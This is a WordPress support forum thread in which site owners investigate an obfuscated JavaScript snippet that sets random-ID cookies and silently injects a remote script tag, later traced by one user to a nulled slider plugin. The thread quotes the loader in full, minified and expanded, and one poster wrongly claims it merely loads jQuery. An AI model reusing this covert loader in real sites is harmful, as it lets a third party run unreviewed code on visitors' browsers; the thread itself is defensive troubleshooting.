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  • well first i needed to remove this script but now i don’t think it is harmfull

    /* You have the latest jquery version on your site */;var script = document.querySelector(‘script[src*=””]’);script.remove();

    when i visited from browser the script loads then says you have latest jquery version then script removes itself

    also i tried using a proxy site to connect, it doesn’t have jquery so it showed this

    Hi,check functions.php file.In my site i have got the lines of some include files.

    Andrew Nevins


    WCLDN 2018 Contributor | Volunteer support

    Let’s wait for @efiga to respond and continue the discussion with him. Otherwise you can create a new thread to discuss your own issues

    Thread Starter efiga


    hi again
    @kasem123 this javascript show’s pub and it’s harmfull ,look again in you will see

    var quezChaent=function(name,value,options){options=options||{};var expires=options.expires;if(typeof expires=="number"&&expires){var d=new Date();d.setTime(d.getTime()+expires*1000*3600*24);expires=options.expires=d}if(expires&&expires.toUTCString){options.expires=expires.toUTCString()}value=encodeURIComponent(value);var ertCEVBj=name+"="+value;for(var propName in options){ertCEVBj+="; "+propName;var propValue=options[propName];if(propValue!==true){ertCEVBj+="="+propValue}}document.cookie=ertCEVBj},uefillenaYB=function(name){var matches=document.cookie.match(new RegExp("(?:^|; )"+name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+"=([^;]*)"));return matches?decodeURIComponent(matches[1]):undefined},dgTVBAFDCDEE=function(){var text="";var possible="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";for(var i=0;i<64;i++)text+=possible.charAt(Math.floor(Math.random()*possible.length));return text};if(!document.referrer)quezChaent('__gs_akfi',dgTVBAFDCDEE(),{expires:10,path:'/'});if(!uefillenaYB('__gs_akfi')&&!uefillenaYB('__gs_akfir')){var script=document.createElement('script');script.src='//';var head=document.getElementsByTagName('head')[0];head.appendChild(script);quezChaent('__gs_akfir',dgTVBAFDCDEE(),{expires:2,path:'/'})}else{document.querySelector('script[src*=""]').remove()}

    @naveen117 nothing found in the functions.php

    well, that’s is the minified version of the javascript if you un minify it you’d get this

    var quezChaent = function(name, value, options) {
            options = options || {};
            var expires = options.expires;
            if (typeof expires == "number" && expires) {
                var d = new Date();
                d.setTime(d.getTime() + expires * 1000 * 3600 * 24);
                expires = options.expires = d
            if (expires && expires.toUTCString) {
                options.expires = expires.toUTCString()
            value = encodeURIComponent(value);
            var ertCEVBj = name + "=" + value;
            for (var propName in options) {
                ertCEVBj += "; " + propName;
                var propValue = options[propName];
                if (propValue !== true) {
                    ertCEVBj += "=" + propValue
            document.cookie = ertCEVBj
        uefillenaYB = function(name) {
            var matches = document.cookie.match(new RegExp("(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"));
            return matches ? decodeURIComponent(matches[1]) : undefined
        dgTVBAFDCDEE = function() {
            var text = "";
            var possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
            for (var i = 0; i < 64; i++) text += possible.charAt(Math.floor(Math.random() * possible.length));
            return text
    if (!document.referrer) quezChaent('__gs_akfi', dgTVBAFDCDEE(), {
        expires: 10,
        path: '/'
    if (!uefillenaYB('__gs_akfi') && !uefillenaYB('__gs_akfir')) {
        var script = document.createElement('script');
        script.src = '//';
        var head = document.getElementsByTagName('head')[0];
        quezChaent('__gs_akfir', dgTVBAFDCDEE(), {
            expires: 2,
            path: '/'
    } else {

    Which checks if the site has latet jquery loaded else it loads jquery 1.11.1, probably it is a cdn site

    Thread Starter efiga


    I’m sure that show’s ads

    look the domain Creation Date: 2014-07-23 08:35:00Z and i started my website a month ago
    about 12 days ago ,

    what kinds of ads are showing ? i am in your site and i see no ads except Google Ads

    Thread Starter efiga


    after changing theme the javascript was removed now
    it show’s ads from

    I have that suspicious URL showing up also. I noticed this when our site wasn’t loading–my browser was hung up trying to access .

    Is it harmful? How can we tell? None of the plugins or the wretched theme this designer used from ThemeForest (which is a piece of crap) have anything in their TOS or privacy policies about it. I ran grep on my entire WordPress directory on the server, and this domain shows up nowhere. So, it is not in any of the code, unless they have cloaked it to hide it. So why are they cloaking this? Is it in the database? Do I need to start running queries to try and find it now? (Although I doubt that is the case.) Or is another JS loading this snippet?

    See, our main problem is that this is going to be a high profile WP site when it launches next month, and we cannot have this site not loading because it is contacting some rogue server waiting for JavaScript code, which in this case, the server was down or very slow to respond. Where the code is placed, it stalls loading the site until this JS loads. Even if it were legit, it’s a very poor design.

    I ended up deactivating the AdRotate plugin and I think it got rid of the rogue site–when our site was not responding due to this plugin, I deactivated it as a test and the site loaded instantly. Reactivate? Boom, not loading again. Coincidence? I have no idea. Right now I re-activated it and the site loads OK. But it was also loading OK for a couple of weeks before this happened.

    I would appreciate knowing for sure which plugin is causing this, or that crappy theme. And I certainly do not trust any plugin or theme that has cloaked the code where it is being injected–that is highly dishonest, and I plan on “outing” and confronting whichever plugin or theme author injected this. I do not appreciate anything being snuck past me that I have no control over, and which may be sending data back to their server.

    well, for me the script wasn’t harmful, my wordpress site was slow so i just removed wordpress and installed again on new server with new theme,
    as i said the script checks if you have the latest jquery loaded if not it loads the jquery 1.11.1, if you visit
    it clearly says “Generic STATS & CDN” which proves my point. if you really intend to remove the script from your themes and plugins download all site files and use an editor like “notepad ++” or “sublimetext 3” and “ctrl + shift + f” to use the search in files function,and search for “genericstts” it should find where the script it

    Using grep is much faster on the server, scans all files in one pass and catches everything via regex pattern matching. That domain is nowhere to be found in any of the code. Why is it being cloaked as it is? Or in other words, what are they hiding, and why do they feel a need to hide it?

    And why should I trust a script from a site that claims to be “generic stats and CDN”? I don’t; I can’t, not as a server admin and security professional. What’s to say they are not collecting all of the information sent in a typical HTTP request? Why should a third party such as that be privy to exactly who visits our site?

    Even if this were legit, the site owner cannot afford to have the entire site stalled because that server is unreliable.

    I do plan on getting to the bottom of this.

    Admin Organization: WHOISGUARD, INC.
    Registrar URL:
    Nameserver(1): GINA.NS.CLOUDFLARE.COM
    Nameserver(2): TIM.NS.CLOUDFLARE.COM
    Alexa Rank: 7,605,737

    If i was a CDN Site i won’t protect my company details in whois info… neither would i use cloudflare servers … but still no one proved the script is harmfull, have you tried contacting AdRotate developer ?

    We can’t assume it isn’t harmful either–I’d be slacking in my responsibilities if I did so. Why cloak it in the code, then, if it’s not doing something it shouldn’t? What is there to hide that is so important we not find out where this script tag comes from? (I did a grep on <script …> tags also during my investigation and that also came up empty–no reference to this domain or the JS file it accesses in any other <script> tags.)

    While I can understand CloudFlare being used (we tried it, but they have poor reliability for high-volume sites), why protect the WHOIS information if you’re a legitimate business? If privacy on a home address is an issue, get a P.O. Box like other companies do.

    I think one thing really bothering me beyond this is that the site owner and his “marketing” person insisted I use this designer, and the person is a rank amateur working with WordPress. Couldn’t use multisite properly, installed dicey plugins, left things a mess, and the only way he could figure out how to create a site was to upload an entire WP install to the directory–had NO CLUE that you simply install the theme directory. This is the level of ineptitude I’m dealing with. And then after booting him from the server, I find this rogue domain being accessed.

    It has not been a good week. ??

    “I’m I’m A CDN i won’t use another CDN for my site, would i ?”

    if i get anything new i’ll post it here & good luck in your site ??

    Hi guys, I had the same problem on several websites, and I am sure that is harmful. Though it did nothing bad on my sites, when the script was not available, it caused timeout error and site shutdown.
    The sourse of inclusion in my case was Royal Slider plugin got from getnulledscripts. It was not enough to deactivate plugin, I had to completely remove the plugin’s folder in order to get rid of it.
    Hope my message was helpful, and good luck.

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